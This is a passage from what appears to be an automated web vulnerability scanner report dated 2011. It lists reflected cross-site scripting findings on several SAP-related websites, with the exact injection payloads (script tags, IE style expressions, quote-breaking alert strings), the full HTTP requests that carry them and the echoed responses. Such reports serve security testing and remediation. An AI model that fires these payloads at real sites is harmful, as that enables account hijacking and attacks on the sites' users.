<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>98e1be46692/swc/common.tao">http://www.sapbusinessoptimizer.com/jsff9f9<script>alert(1)</script>98e1be46692/swc/common.tao</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ded0b"><script>alert(1)</script>a2327f34e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:50 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 805 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/js/swcded0b"><script>alert(1)</script>a2327f34e3/common.tao"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2db3<script>alert(1)</script>2ad3d8843b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:51 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 803 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>2ad3d8843b1/common.tao">http://www.sapbusinessoptimizer.com/js/swcc2db3<script>alert(1)</script>2ad3d8843b1/common.tao</a> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload abbb8<script>alert(1)</script>28ecfb46467 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:52 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 803 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>28ecfb46467">http://www.sapbusinessoptimizer.com/js/swc/common.taoabbb8<script>alert(1)</script>28ecfb46467</a> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f770"><script>alert(1)</script>5e7e43a56dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:52 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 807 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/js/swc/common.tao6f770"><script>alert(1)</script>5e7e43a56dc"> ...[SNIP]...
The value of the ReturnUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf2f"style%3d"x%3aexpression(alert(1))"34bced315ef was submitted in the ReturnUrl parameter. This input was echoed as fcf2f"style="x:expression(alert(1))"34bced315ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5712%20style%3dx%3aexpression(alert(1))%20272adda801e was submitted in the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 parameter. This input was echoed as f5712 style=x:expression(alert(1)) 272adda801e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 15:29:52 GMT Content-Length: 43078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> S ...[SNIP]... <input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1f5712 style=x:expression(alert(1)) 272adda801e" style="width: 668px" /> ...[SNIP]...
3.111. http://www.sapphirenow.com/login.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.sapphirenow.com
Path: /login.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a00f1"style%3d"x%3aexpression(alert(1))"5e28a9da3e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a00f1"style="x:expression(alert(1))"5e28a9da3e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:26:21 GMT Content-Length: 42982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> S ...[SNIP]... <input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1" style="width: 668px" /> ...[SNIP]...
3.112. http://www.sapvirtualevents.com/teched [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.sapvirtualevents.com
Path: /teched
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8105'-alert(1)-'ed14687c86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched?d8105'-alert(1)-'ed14687c86f=1 HTTP/1.1 Host: www.sapvirtualevents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: UrlRewriter.NET 2.0.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:30:55 GMT Content-Length: 92618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.113. http://www.sapvirtualevents.com/teched/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.sapvirtualevents.com
Path: /teched/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b6c'-alert(1)-'d067c1ecac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/?d4b6c'-alert(1)-'d067c1ecac1=1 HTTP/1.1 Host: www.sapvirtualevents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: UrlRewriter.NET 2.0.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:30:40 GMT Content-Length: 92618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.114. http://www.sapvirtualevents.com/teched/Sessions.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.sapvirtualevents.com
Path: /teched/Sessions.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af3a6'-alert(1)-'cb07f8d2693 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/Sessions.aspx?af3a6'-alert(1)-'cb07f8d2693=1 HTTP/1.1 Host: www.sapvirtualevents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sat, 15 Oct 2011 15:05:07 GMT Connection: close X-Powered-By: UrlRewriter.NET 2.0.0 X-Powered-By: ASP.NET Content-Length: 81914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.115. http://www.sapvirtualevents.com/teched/default.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.sapvirtualevents.com
Path: /teched/default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5afd5'-alert(1)-'3a8fca97ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ReturnUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433fe'%3balert(1)//fea0f539288 was submitted in the ReturnUrl parameter. This input was echoed as 433fe';alert(1)//fea0f539288 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288 HTTP/1.1 Host: www.sapvirtualevents.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: UrlRewriter.NET 2.0.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:30:56 GMT Content-Length: 92626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.117. http://www.sapvirtualevents.com/teched/sessiondetails.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.sapvirtualevents.com
Path: /teched/sessiondetails.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee866'-alert(1)-'cfeab9a4511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /teched/sessiondetails.aspx?ee866'-alert(1)-'cfeab9a4511=1 HTTP/1.1 Host: www.sapvirtualevents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sat, 15 Oct 2011 15:05:11 GMT Connection: close X-Powered-By: UrlRewriter.NET 2.0.0 X-Powered-By: ASP.NET Content-Length: 87238
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.118. http://www.sdn.sap.com/irj/scn/advancedsearch [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/advancedsearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926f2"><a>1b7807551cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Content-Length: 28856 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 15:01:13 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact&926f2"><a>1b7807551cd=1"> ...[SNIP]...
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d29"><a>12c19bdc070 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Content-Length: 28909 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 15:00:43 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact95d29"><a>12c19bdc070"> ...[SNIP]...
3.120. http://www.sdn.sap.com/irj/scn/bc [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/bc
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf04"><a>cae7ae068e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/bc?8cf04"><a>cae7ae068e4=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:05:17 GMT Content-Length: 23294 Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/bc?8cf04"><a>cae7ae068e4=1"> ...[SNIP]...
3.121. http://www.sdn.sap.com/irj/scn/downloads [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aa4b"><a>cc0ea3522ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1 HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c Expires: 0 Date: Sat, 15 Oct 2011 15:05:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=scn; Path=/ Content-Length: 61396
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1"> ...[SNIP]...
3.122. http://www.sdn.sap.com/irj/scn/index [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/index
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b43e"><a>55547d3eb18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/index?3b43e"><a>55547d3eb18=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:05:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 57953
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/index?3b43e"><a>55547d3eb18=1"> ...[SNIP]...
3.123. http://www.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a6d"><a>e74a0162951 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /irj/scn/logon?c6a6d"><a>e74a0162951=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:10 GMT
Content-Length: 21705
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/logon?c6a6d"><a>e74a0162951=1"> ...[SNIP]...
3.124. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/sdnweblogs/popularposts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e88"><a>b718e3f5e9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 30557
Date: Sat, 15 Oct 2011 14:59:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/sdnweblogs/popularposts?21e88"><a>b718e3f5e9a=1"> ...[SNIP]...
The value of the blog request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b98"><a>ea3bc329510 was submitted in the blog parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28808
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:53 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/2774b98"><a>ea3bc329510"> ...[SNIP]...
3.126. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/weblogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7cea"><a>41405d9f727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
